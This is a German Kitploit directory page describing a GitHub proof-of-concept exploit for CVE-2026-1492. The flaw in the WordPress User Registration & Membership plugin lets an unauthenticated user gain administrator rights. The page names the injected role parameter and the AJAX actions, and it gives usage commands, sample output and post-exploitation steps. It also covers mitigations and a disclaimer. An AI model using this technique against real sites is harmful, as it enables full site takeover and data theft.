Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-1492 — Proof-of-Concept-Exploit für CVE-2026-1492 im WordPress-Plugin „User Registration“, das eine nicht authentifizierte Rechteausweitung zum Administrator über eine manipulierte Mitgliedschaftsregistrierung ermöglicht. | Kitploit
Tools/GitHubGitHub/the8frust/cve-2026-1492
Privilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubthe8frust/cve-2026-1492

CVE-2026-1492

Proof-of-Concept-Exploit für CVE-2026-1492 im WordPress-Plugin „User Registration“, das eine nicht authentifizierte Rechteausweitung zum Administrator über eine manipulierte Mitgliedschaftsregistrierung ermöglicht.

Repository anzeigen
3vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-1492 - WordPress User Registration Plugin Exploit zur Rechteausweitung

Beschreibung

Dieses Repository enthält einen Proof-of-Concept-Exploit für CVE-2026-1492, eine kritische Schwachstelle, die das WordPress-Plugin User Registration & Membership betrifft.

Die Schwachstelle ermöglicht es nicht authentifizierten Angreifern, Administrator-Konten zu erstellen, indem der Mitgliedschafts-Registrierungsprozess missbraucht wird.

👉 Eine vollständige technische Analyse dieser Schwachstelle ist hier verfügbar:
Technische Analyse
Sie erklärt Schritt für Schritt, wie das Backend angreiferkontrollierte Daten verarbeitet und warum die Rechteausweitung möglich ist.


Schwachstellendetails

  • CVE-ID: CVE-2026-1492
  • Komponente: User Registration & Membership Plugin (WPEverest)
  • Betroffene Versionen: <= 5.1.2
  • Schwachstellentyp: Unsachgemäßes Berechtigungsmanagement (CWE-269)
  • Erforderliche Authentifizierung: Nein
  • CVSS-Score: 9.8 (Kritisch)

Grundursache

Das Plugin vertraut während des Mitgliedschafts-Registrierungsprozesses unsachgemäß benutzerkontrollierten Eingaben.

Im Einzelnen:

  • Das Backend akzeptiert eine vom Benutzer bereitgestellte role
  • Es wird keine serverseitige Whitelist erzwungen
  • Die Rolle wird direkt auf den erstellten Benutzer angewendet

Dies ermöglicht es Angreifern, Folgendes festzulegen:

root@kitploit:~
"role": "administrator"

und vollständigen administrativen Zugriff zu erlangen.


Auswirkungen

Eine erfolgreiche Ausnutzung ermöglicht:

  • Vollständigen WordPress-Admin-Zugriff
  • Installation von bösartigen Plugins/Themes
  • Beliebige PHP-Codeausführung (über das Admin-Panel)
  • Datenbank-Exfiltration
  • Vollständige Übernahme der Website

Exploit-Ablauf

Die Schwachstelle wird über einen mehrstufigen AJAX-Prozess ausgelöst:

  1. CSRF-Tokens und Formular-IDs abrufen
  2. Einen Benutzer über user_registration_user_form_submit registrieren
  3. Mitgliedschaftsregistrierung über user_registration_membership_register_member auslösen
  4. Einen bösartigen Rollenparameter (administrator) injizieren

Exploit-Funktionen

  • Automatische Token-Extraktion (nonce, form_id, security)
  • Automatische Mitgliedschafts-ID-Extraktion
  • Session-Handling (Cookies)
  • Saubere CLI-Ausgabe
  • Debug-Modus zur Anfrageprüfung

Verwendung

root@kitploit:~
python3 exploit.py -t http://target -ru 'http://target/?page_id=6'

Beispiel

root@kitploit:~
python3 exploit.py -t http://localhost:5000 -ru 'http://localhost:5000/?page_id=6'

Ausgabe

root@kitploit:~
[*] Tokens werden extrahiert...
[+] form_id: 5
[+] frontend_nonce: XXXXX
[+] security: XXXXX
[+] wpnonce: XXXXX
[+] membership_id: 12

[*] Registrierungsanfrage wird gesendet...
[+] Benutzer erstellt

[*] Mitgliedschaftsanfrage wird gesendet...
[+] Rechteausweitung erfolgreich

Post-Exploitation

Melden Sie sich mit den generierten Anmeldedaten an:

root@kitploit:~
http://target/wp-login.php

Greifen Sie dann auf das Admin-Panel zu:

root@kitploit:~
http://target/wp-admin/

Hinweis: Der Admin-Pfad kann angepasst sein.


Gegenmaßnahmen

  • Plugin auf Version >= 5.1.3 aktualisieren
  • Plugin deaktivieren, wenn ein Patch nicht möglich ist
  • Auf unbefugte Erstellung von Administrator-Konten überwachen

Haftungsausschluss

Dieser Exploit wird nur für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt.

Verwenden Sie ihn nicht gegen Systeme ohne Erlaubnis.


Referenzen

  • CVE-2026-1492 (NVD)
  • Wordfence Advisory
  • Öffentliche Exploit-Berichte
Tool herunterladen